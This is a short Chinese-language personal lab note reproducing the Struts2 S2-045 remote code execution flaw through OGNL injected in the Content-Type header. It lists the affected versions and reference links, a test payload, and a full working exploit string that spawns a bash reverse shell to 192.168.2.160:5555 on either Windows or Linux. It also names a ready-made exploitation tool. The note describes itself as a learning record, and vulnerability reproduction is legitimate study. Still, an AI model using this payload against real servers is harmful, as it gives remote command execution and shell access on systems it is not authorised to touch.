Struts2-045远程代码执行漏洞复现
漏洞原理
当基于Jakarta插件上传文件时,可导致远程代码执行。
通过Content-Type这个header头,注入OGNL语言,进而执行命令。
漏洞的点在于,由于Strus2对错误消息处理时,出现了纰漏。
传入了非法的Content-type之后会引发JakartaMultiPartRequest类报错
原理可参考博客
https://paper.seebug.org/241/
https://blog.csdn.net/u011721501/article/details/60768657
影响版本
Struts 2.3.5 - Struts 2.3.31
Struts 2.5 - Struts 2.5.10
漏洞复现
- 访问靶机
- 测试
%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',2*2)}.multipart/form-data
测试成功
3. 利用EXP
%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "bash -i >&/dev/tcp/192.168.2.160/5555 0>&1"|bash').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
利用成功!
- 工具利用Struts2_Test17.jar
成功!
本文属于个人笔记,仅用于学习,请勿拿来从事非法活动。